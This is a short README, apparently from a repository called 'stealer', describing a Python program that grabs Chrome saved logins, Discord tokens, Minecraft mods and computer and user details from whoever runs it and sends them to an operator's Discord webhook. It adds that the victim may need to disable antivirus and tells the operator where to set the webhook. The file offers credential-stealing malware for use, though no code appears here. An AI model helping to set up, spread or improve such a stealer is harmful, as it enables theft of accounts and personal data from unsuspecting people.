3022-2/stealer/README.md

 # stealer
 A program made in python.
 Grabs chrome login information, Minecraft mods (under 8mb), basic computer info and user info, discord tokens and sends to the discord webhook you set

+THIS MAY REQUIRE THE PERSON RUNNING main.py TO DISABLE ANTIVIRUS

 HOW TO USE:

 1: set your discord webhook in line 20 in the file main.py